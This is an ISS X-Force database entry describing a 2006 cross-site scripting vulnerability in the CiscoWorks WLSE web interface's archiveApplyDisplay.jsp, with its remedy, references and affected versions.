ISS X-Force Database: cisco-wlse-user-xss(25883): CiscoWorks WLSE Web interface archiveApplyDisplay.jsp cross-site scripting

CiscoWorks WLSE Web interface archiveApplyDisplay.jsp cross-site scripting

cisco-wlse-user-xss (25883)

Medium Risk

Description:

CiscoWorks Wireless LAN Solution Engine (WLSE) appliances are vulnerable to cross-site scripting, caused by improper validation of user-supplied input /wlse/configure/archive/archiveApplyDisplay.jsp script. A remote attacker could exploit this vulnerability using the 'displayMsg' parameter to execute script in a victim's Web browser within the security context of the Web user interface, allowing the attacker to steal the victim's cookie-based authentication credentials and gain administrative access to the Web interface.

Consequences:

Gain Access

Remedy:

Upgrade to the latest version of the WLSE software (2.13 or later), as listed in Cisco Security Advisory cisco-sa-20060419-wlse. See References.

References:

Assurance.com.au - Vulnerability Advisory: Multiple vulnerabilities in Linux based Cisco products.
BugTraq Mailing List, Wed Apr 19 2006 - 10:15:32 CDT: Multiple vulnerabilities in Linux based Cisco products.
BugTraq Mailing List, Wed Apr 19 2006 - 10:42:50 CDT: Re: Multiple vulnerabilities in Linux based Cisco products.
Cisco Security Response 2006 April 19 1500 UTC (GMT): Response to Privilege Escalation on Multiple Cisco Products.
cisco-sa-20060419-wlse: Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance.
BID-17604: Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability
CVE-2006-1960: Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095.
OSVDB ID: 24812: CiscoWorks WLSE archiveApplyDisplay.jsp displayMsg Variable XSS
SA19736: Cisco WLSE Privilege Escalation and Cross-Site Scripting
SECTRACK ID: 1015965: CiscoWorks Wireless LAN Solution Engine Cross-Site Scripting Flaw Yields Administrative Privileges and Command Line Bug Lets Remote Authenticated Users Gain Shell Access
VUPEN/ADV-2006-1434: CiscoWorks Wireless LAN Solution Engine (WLSE) Multiple Vulnerabilities

Platforms Affected:

Cisco Wireless LAN Solution Engine 2.0
Cisco Wireless LAN Solution Engine 2.0 Express
Cisco Wireless LAN Solution Engine 2.1
Cisco Wireless LAN Solution Engine 2.1 Express
Cisco Wireless LAN Solution Engine 2.10 Express
Cisco Wireless LAN Solution Engine 2.10
Cisco Wireless LAN Solution Engine 2.11 Express
Cisco Wireless LAN Solution Engine 2.11
Cisco Wireless LAN Solution Engine 2.12 Express
Cisco Wireless LAN Solution Engine 2.12
Cisco Wireless LAN Solution Engine 2.13
Cisco Wireless LAN Solution Engine 2.13 Express
Cisco Wireless LAN Solution Engine 2.2
Cisco Wireless LAN Solution Engine 2.2 Express
Cisco Wireless LAN Solution Engine 2.3
Cisco Wireless LAN Solution Engine 2.3 Express
Cisco Wireless LAN Solution Engine 2.4 Express
Cisco Wireless LAN Solution Engine 2.4
Cisco Wireless LAN Solution Engine 2.5
Cisco Wireless LAN Solution Engine 2.5 Express
Cisco Wireless LAN Solution Engine 2.6 Express
Cisco Wireless LAN Solution Engine 2.6
Cisco Wireless LAN Solution Engine 2.7
Cisco Wireless LAN Solution Engine 2.7 Express
Cisco Wireless LAN Solution Engine 2.8
Cisco Wireless LAN Solution Engine 2.8 Express
Cisco Wireless LAN Solution Engine 2.9 Express
Cisco Wireless LAN Solution Engine 2.9

Reported:

Apr 19, 2006

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net

Return to the main page